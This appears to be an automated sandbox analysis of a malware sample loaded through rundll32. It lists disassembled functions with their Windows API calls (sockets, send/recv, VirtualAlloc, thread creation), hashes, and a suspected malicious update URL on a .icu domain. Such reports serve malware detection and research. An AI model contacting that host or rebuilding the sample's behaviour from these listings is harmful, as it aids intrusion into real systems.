                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ExclusiveIos_base_dtorLockstd::ios_base::_$AcquireRelease
                    • String ID: https://www.dj5a2sbj.icu/yj/update.xml
                    • API String ID: 2960325935-1378649669
                    • Opcode ID: 8718f7430024e22ba2be338c9d188b26385f48f1e879ff1aec6df2f066d1f67a
                    • Instruction ID: 26dfa4e6890375d42a4dc3d43ddcd416396d6fd215c3709bfe73fafc6fdecb7f
                    • Opcode Fuzzy Hash: 8718f7430024e22ba2be338c9d188b26385f48f1e879ff1aec6df2f066d1f67a
                    • Instruction Fuzzy Hash: D351B0759412189BEB10CF14DC89FDAB7B8EF04708F1440A5E919A7391EB72EE89CF91
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID: Recv failure: %s
                    • API String ID: 2514157807-4276829032
                    • Opcode ID: 3ea7e0d2076df870cd23478910d50681c259cb47dcc8c40d00fb9601e6e55107
                    • Instruction ID: d466152505062ca2b12f00290d37cb2dfd3ba2043c8ad14739adf0e59129efee
                    • Opcode Fuzzy Hash: 3ea7e0d2076df870cd23478910d50681c259cb47dcc8c40d00fb9601e6e55107
                    • Instruction Fuzzy Hash: B231CD745083109FE321DF28C884BEAB7F4FF8E318F054A29E99997352D771A955CB82
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastsend
                    • String ID: Send failure: %s
                    • API String ID: 1802528911-857917747
                    • Opcode ID: fc73a53c576fbe74ec89cc92d5308e697ce26979c3ed3beca1efa54f29cde032
                    • Instruction ID: a7b1d7f3435432130bfae8b6051b358d1f966898f1eaab72e3be16a35cfe91a2
                    • Opcode Fuzzy Hash: fc73a53c576fbe74ec89cc92d5308e697ce26979c3ed3beca1efa54f29cde032
                    • Instruction Fuzzy Hash: 5A2139755082119FD321DF14C884FEAB7F4FF8E310F014669E9999B241C771A955CB92
                    APIs
                    • wsprintfA.USER32 ref: 04EC7874
                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 04EC78F7
                    • __CxxThrowException@8.LIBCMT ref: 04EC798F
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Exception@8FreeThrowVirtualwsprintf
                    • String ID:
                    • API String ID: 431775021-0
                    • Opcode ID: 265fe213b91f332904f83760c5686f0a2f7005f84a95f82bbd283de1bf31583c
                    • Instruction ID: a58382b1f86a94f1816d23436ffef236642c0ad443d8441a70ce9675f7f6f0c1
                    • Opcode Fuzzy Hash: 265fe213b91f332904f83760c5686f0a2f7005f84a95f82bbd283de1bf31583c
                    • Instruction Fuzzy Hash: D2618EB1A002168FDB24DF69CD84AABB7B5EF88314F1495ADE90997340EA35FD41CF90
                    APIs
                    • getaddrinfo.WS2_32(?,?,?,?), ref: 6D01C0B1
                    • freeaddrinfo.WS2_32(?,?), ref: 6D01C1C6
                    • WSASetLastError.WS2_32(00002AF9,?), ref: 6D01C210
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastfreeaddrinfogetaddrinfo
                    • String ID:
                    • API String ID: 1817844550-0
                    • Opcode ID: cf168297799817cc53bb1a9bcdc1b94adcc55b6aef48689403b47b7d11b39c63
                    • Instruction ID: 4c75bb7237e442a56866dcd715597ac05e7e72a24bd2b13478b7818982135f4e
                    • Opcode Fuzzy Hash: cf168297799817cc53bb1a9bcdc1b94adcc55b6aef48689403b47b7d11b39c63
                    • Instruction Fuzzy Hash: CF518D71A483128BEB11CF99C880B2BF7F4BF8A714F05496DEC999B211D731E904CB95
                    APIs
                    • __floor_pentium4.LIBCMT ref: 04EC7E11
                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,?,?,?,?,?,04EC8015), ref: 04EC7E4D
                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,04EC8015,00000000), ref: 04EC7E8C
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Virtual$AllocFree__floor_pentium4
                    • String ID:
                    • API String ID: 2605973128-0
                    • Opcode ID: 8ad64454121936d459a1934aa9539f2935081e197196d5faa000ac45b1b0a835
                    • Instruction ID: da9c0b6369975e8e4b8e282c800ccd1a924ac004c6dbe04fdfbac3745f989a44
                    • Opcode Fuzzy Hash: 8ad64454121936d459a1934aa9539f2935081e197196d5faa000ac45b1b0a835
                    • Instruction Fuzzy Hash: D32108717087059FD7508F6EE981A2BFBE4EF80759F405A2DF999C2690E630F8018B51
                    APIs
                    • __floor_pentium4.LIBCMT ref: 04EC7EE6
                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04EC7F1D
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual__floor_pentium4
                    • String ID:
                    • API String ID: 4174053956-0
                    • Opcode ID: d73c2332881d042dc47ec13380035c714720853086dfbf03a5188a6ed23cfc13
                    • Instruction ID: 6e21c20160893851ac4bc614cac51cff06573e44fa3adab7a14b4af872cbaa4b
                    • Opcode Fuzzy Hash: d73c2332881d042dc47ec13380035c714720853086dfbf03a5188a6ed23cfc13
                    • Instruction Fuzzy Hash: 5F21F2717087419FD7508F2AEE8162BB7E8FF80716F005A2DF999C2680E631EC018B56
                    APIs
                    • __RTC_Initialize.LIBCMT ref: 6D048AD4
                      • Part of subcall function 6D049CA7: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000001,00000000,00000001,6D048AD9,6D0866F0,00000010,6D048A6F,?,?,?,6D048C97,?,00000001,?,?,00000001), ref: 6D049CC0
                      • Part of subcall function 6D049B4F: InitializeSListHead.KERNEL32(6D08A898,6D048ADE,6D0866F0,00000010,6D048A6F,?,?,?,6D048C97,?,00000001,?,?,00000001,?,6D086738), ref: 6D049B54
                      • Part of subcall function 6D05C343: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,?,6D05C5ED,6D07036C,6D070370,6D086BC0,00000014,6D05C525,6D086BE0,00000008,6D05C6AD,?,?,6D05C80B,93BD9D6B), ref: 6D05C35A
                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D048B3E
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,00000002,00000001,6D0866F0,00000010,6D048A6F,?,?,?,6D048C97,?,00000001,?,?,00000001,?), ref: 6D048B54
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: DisablePrintScreen@@$Initialize$HeadList___scrt_is_nonwritable_in_current_image
                    • String ID:
                    • API String ID: 1081537013-0
                    • Opcode ID: f9a267ee04ebe1f49988b135cb9e5340f79da4770604516c63d3faa26edfced4
                    • Instruction ID: c0e74a8bf2554af5cb0b967af18d38e48ce23f0089a50a5594631054f31f4874
                    • Opcode Fuzzy Hash: f9a267ee04ebe1f49988b135cb9e5340f79da4770604516c63d3faa26edfced4
                    • Instruction Fuzzy Hash: 1C21C07254D306EEFF24ABA49604FAD37B19F0622DF21C979C6846B1C2DF221084C6E9
                    APIs
                    • CreateThread.KERNEL32(?,?,Function_0006BDF2,00000000,?,?), ref: 6D05BF97
                    • GetLastError.KERNEL32 ref: 6D05BFA3
                    • __dosmaperr.LIBCMT ref: 6D05BFAA
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CreateErrorLastThread__dosmaperr
                    • String ID:
                    • API String ID: 2744730728-0
                    • Opcode ID: 1b98263f425567c1864eff3696e93ff93a74c0d01dc67d33c6973283b202d3de
                    • Instruction ID: d8a0fd04c91bd24f71c417112a1191612b90cf6a33fe35eac260b847fe7fc9a4
                    • Opcode Fuzzy Hash: 1b98263f425567c1864eff3696e93ff93a74c0d01dc67d33c6973283b202d3de
                    • Instruction Fuzzy Hash: D801923651821AEFEF058FA2CE04BAE7BB5EF01364F004014FD0197150DB31E960DB90
                    APIs
                    • GetLastError.KERNEL32(6D086B38,0000000C), ref: 6D05BE05
                    • ExitThread.KERNEL32 ref: 6D05BE0C
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000000,6D086B38,0000000C), ref: 6D05BE42
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: DisableErrorExitLastPrintScreen@@Thread
                    • String ID:
                    • API String ID: 2672339741-0
                    • Opcode ID: d3495180f3c9b30692c9f98ee6f718c1dd8b8e52a80222bdb73480fc918d362b
                    • Instruction ID: af43e054636ee2005083299382a164c53252d59a9f18b7973021c23cc8cb3195
                    • Opcode Fuzzy Hash: d3495180f3c9b30692c9f98ee6f718c1dd8b8e52a80222bdb73480fc918d362b
                    • Instruction Fuzzy Hash: EDF0C270908208AFEB049F70C508B2E3BB4EF46318F21415DEA059B291DB316920CFA2
                    APIs
                    • SleepEx.KERNEL32 ref: 6D037367
                    • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000000), ref: 6D037385
                    • WSAGetLastError.WS2_32 ref: 6D03738F
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastSleepgetsockopt
                    • String ID:
                    • API String ID: 3033474312-0
                    • Opcode ID: 0d69943f46ebcfef41dfafc8cc0512818983167a3e2e960cb81b0c57e90f805e
                    • Instruction ID: 494296918cc64027c8b293e11625cc96abbcdee70e2f52387e790385b1571e71
                    • Opcode Fuzzy Hash: 0d69943f46ebcfef41dfafc8cc0512818983167a3e2e960cb81b0c57e90f805e
                    • Instruction Fuzzy Hash: FFF01D70648313EBFB54DF11C84576F7BF4AFC2701F218528EA94DA180D775D4098B52
                    APIs
                      • Part of subcall function 6D060D92: GetLastError.KERNEL32(00000000,00000000,6D051F9D,6D062DA2,?,6D060E86,00000001,00000364,00000006,000000FF,6D04DDAB,CE3BFFFF,?,6D04EC1A,6D04FC59,FF85FFFF), ref: 6D060D96
                      • Part of subcall function 6D060D92: SetLastError.KERNEL32(00000000,?,6D04FC59,?,?,?,?,?,00000000,6D04DDAB,?,6CFF2140,?,00000000,?,?), ref: 6D060E38
                    • CloseHandle.KERNEL32(?,?,?,6D05BFDE,?,?,6D05BE50,00000000), ref: 6D05BED8
                    • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,6D05BFDE,?,?,6D05BE50,00000000), ref: 6D05BEEE
                      • Part of subcall function 6D063608: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD ref: 6D06362C
                    • ExitThread.KERNEL32 ref: 6D05BEF7
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorExitLastThread$CloseDisableFreeHandleLibraryPrintScreen@@
                    • String ID:
                    • API String ID: 4260017400-0
                    • Opcode ID: 6a90805e38445b4a88b7ec8642e446500f3468598835769a2d2ea0e599490871
                    • Instruction ID: 400d1a3edba98f763a2c19300aff42c9f2f6fb2b9d546c40745523f606b7e0e2
                    • Opcode Fuzzy Hash: 6a90805e38445b4a88b7ec8642e446500f3468598835769a2d2ea0e599490871
                    • Instruction Fuzzy Hash: 07F034304046566BEF115B368A08B3A3AF8AF02224F098714BE35D75A0DB31EC71C6A2
                    APIs
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(000000FA,?), ref: 6D063183
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: DisablePrintScreen@@
                    • String ID: AppPolicyGetThreadInitializationType
                    • API String ID: 2435750010-3350320272
                    • Opcode ID: 1889458463e3fe4f5eb488c1ed5e878ad476c1f3b72b34f93883a4703cede1f0
                    • Instruction ID: cec9a14b7569558b633c1201eadb90673b8a5369160c63516618ddbd110d3094
                    • Opcode Fuzzy Hash: 1889458463e3fe4f5eb488c1ed5e878ad476c1f3b72b34f93883a4703cede1f0
                    • Instruction Fuzzy Hash: 19E0C23254423C73BA1017958C08FAB3E28DF4B7B0B054331BD2D2B2C2E561494282E6
                    APIs
                      • Part of subcall function 6D04FC5B: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,?,?,00000000,?,?,?,6D04F93A,00000000,00000000,00000000,00000000,00000000,?), ref: 6D04FC91
                      • Part of subcall function 6D05E5EF: GetConsoleOutputCP.KERNEL32(93BD9D6B,00000000,00000000,?), ref: 6D05E652
                    • WriteFile.KERNEL32(?,6D0642E9,00000000,6D065E4B,00000000,6D0642E9,00000000,00000000,?,6D065E4B,00000000,00000000,6D065D88,6D0642E9,00000000,?), ref: 6D05F05E
                    • GetLastError.KERNEL32(?,6D065E4B,00000000,00000000,6D065D88,6D0642E9,00000000,?,6D05A8FE,00000000,6D0642E9), ref: 6D05F068
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ConsoleDisableErrorFileLastOutputPrintScreen@@Write
                    • String ID:
                    • API String ID: 1227899511-0
                    • Opcode ID: 73a2f239999a6c96a57e127467070556c2cca538786cfa69898ee01ff42345fa
                    • Instruction ID: 4a3e0eb29826f43a9c011288b77bd407f369014768852e900d29771d7314af46
                    • Opcode Fuzzy Hash: 73a2f239999a6c96a57e127467070556c2cca538786cfa69898ee01ff42345fa
                    • Instruction Fuzzy Hash: 7E61A17580415AAFEF01CFA8CA44FAEBFB9BB0A308F154245ED50E7246D776D921CB60
                    APIs
                    • socket.WS2_32(?,?,00000000), ref: 6D0372FC
                    • socket.WS2_32(?,00000002,00000000), ref: 6D037319
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: socket
                    • String ID:
                    • API String ID: 98920635-0
                    • Opcode ID: 9ff7d1d17c1b794a3a1a249c07a66084ca2f90c2917000f64082a1d2bac5772b
                    • Instruction ID: 83592f5afae9cea2cec1a345c498c13d2e1f5334d21e0dce398431a7a6c42ae5
                    • Opcode Fuzzy Hash: 9ff7d1d17c1b794a3a1a249c07a66084ca2f90c2917000f64082a1d2bac5772b
                    • Instruction Fuzzy Hash: CA119435604213EFEB21CF65C840B4AB7F1FF8A321F104969F564972A0C371E851CB51
                    APIs
                    • socket.WS2_32(00000017,00000002,00000000), ref: 6D011014
                      • Part of subcall function 6D010FD0: closesocket.WS2_32(00000000), ref: 6D01102E
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: closesocketsocket
                    • String ID:
                    • API String ID: 2760038618-0
                    • Opcode ID: 42d6ec1fbe4664561908f9966bfef9b2906878ad2517ed61b5804b0a56fb1a0a
                    • Instruction ID: 0ac71ed305306770c5abda4fb64e5b6356bcd1c9c2a00f521ad317292451cc2b
                    • Opcode Fuzzy Hash: 42d6ec1fbe4664561908f9966bfef9b2906878ad2517ed61b5804b0a56fb1a0a
                    • Instruction Fuzzy Hash: 81F0F633E0CAB24BE71186788949BCE37E05F02BA1F0A45A4E9497F1D2C3A09C458792
                    APIs
                      • Part of subcall function 04EC7B90: ResetEvent.KERNEL32(?,762323A0,?,?), ref: 04EC7BB3
                      • Part of subcall function 04EC7B90: socket.WS2_32 ref: 04EC7BC6
                    • Sleep.KERNEL32(0000EA60,00000000), ref: 04EC45C5
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 04EC45FE
                    • _memset.LIBCMT ref: 04EC4629
                    • _strncpy.LIBCMT ref: 04EC463F
                    • GetTickCount.KERNEL32 ref: 04EC4664
                    • GetTickCount.KERNEL32 ref: 04EC4675
                    • setsockopt.WS2_32 ref: 04EC46B1
                    • CancelIo.KERNEL32(?), ref: 04EC46BF
                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC46CF
                    • closesocket.WS2_32(?), ref: 04EC46DD
                    • SetEvent.KERNEL32(?), ref: 04EC46EB
                    • Sleep.KERNEL32 ref: 04EC4707
                    • Sleep.KERNEL32(00000BB8), ref: 04EC4721
                    • CloseHandle.KERNEL32(?), ref: 04EC473A
                    • GetTickCount.KERNEL32 ref: 04EC485C
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: CountEventSleepTick$CancelCloseCreateExchangeHandleInterlockedReset_memset_strncpyclosesocketsetsockoptsocket
                    • String ID:
                    • API String ID: 1535685871-0
                    • Opcode ID: 565df32670481cbd6e49b5cb77ee843566f71ceb2f9e88fb3ae759cd89c3a8b4
                    • Instruction ID: 9176e78f362a3d3e3952a365b7a189ec87b25d4dde6dcb01de3a93adce45b229
                    • Opcode Fuzzy Hash: 565df32670481cbd6e49b5cb77ee843566f71ceb2f9e88fb3ae759cd89c3a8b4
                    • Instruction Fuzzy Hash: 2CF096316082418EE764DF55E9517E9B3F4FF85708F00145DE94A87180EB307906CB92
                    APIs
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,6D06A41E,6D04EA46,00000000,6D04EA46,?,6D06A6BF,6D04EA46,00000007,6D04EA46,?,6D068357,6D04EA46,6D04EA46), ref: 6D05F818
                    • GetLastError.KERNEL32(6D04EA46,?,6D06A41E,6D04EA46,00000000,6D04EA46,?,6D06A6BF,6D04EA46,00000007,6D04EA46,?,6D068357,6D04EA46,6D04EA46), ref: 6D05F823
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 485612231-0
                    • Opcode ID: 769937ee211d73572489d3ab6a075fe9723038a657736061249ab4d216de2bbf
                    • Instruction ID: 25f7c4802ee033e0d75188ce689445034be310f328f42cece5342f4729ad5cc3
                    • Opcode Fuzzy Hash: 769937ee211d73572489d3ab6a075fe9723038a657736061249ab4d216de2bbf
                    • Instruction Fuzzy Hash: 8CE08632508218ABDF011FA1DD08B6A3BB8EB02756F114460FA089B0A0DB398461CB90
                    APIs
                    • __lock.LIBCMT ref: 04EB8F20
                      • Part of subcall function 04EBB0B8: __mtinitlocknum.LIBCMT ref: 04EBB0CE
                      • Part of subcall function 04EBB0B8: __amsg_exit.LIBCMT ref: 04EBB0DA
                      • Part of subcall function 04EBB0B8: EnterCriticalSection.KERNEL32(00000000,00000000,?,04EB48E3,0000000D,04ECC5A0,00000008,04EB49DA,00000000,?,04EB3E44,00000000,04ECC518,00000008,04EB3EA9,?), ref: 04EBB0E2
                    • __tzset_nolock.LIBCMT ref: 04EB8F31
                      • Part of subcall function 04EB8827: __lock.LIBCMT ref: 04EB8849
                      • Part of subcall function 04EB8827: ____lc_codepage_func.LIBCMT ref: 04EB8890
                      • Part of subcall function 04EB8827: __getenv_helper_nolock.LIBCMT ref: 04EB88B2
                      • Part of subcall function 04EB8827: _free.LIBCMT ref: 04EB88E9
                      • Part of subcall function 04EB8827: _strlen.LIBCMT ref: 04EB88F0
                      • Part of subcall function 04EB8827: __malloc_crt.LIBCMT ref: 04EB88F7
                      • Part of subcall function 04EB8827: _strlen.LIBCMT ref: 04EB890D
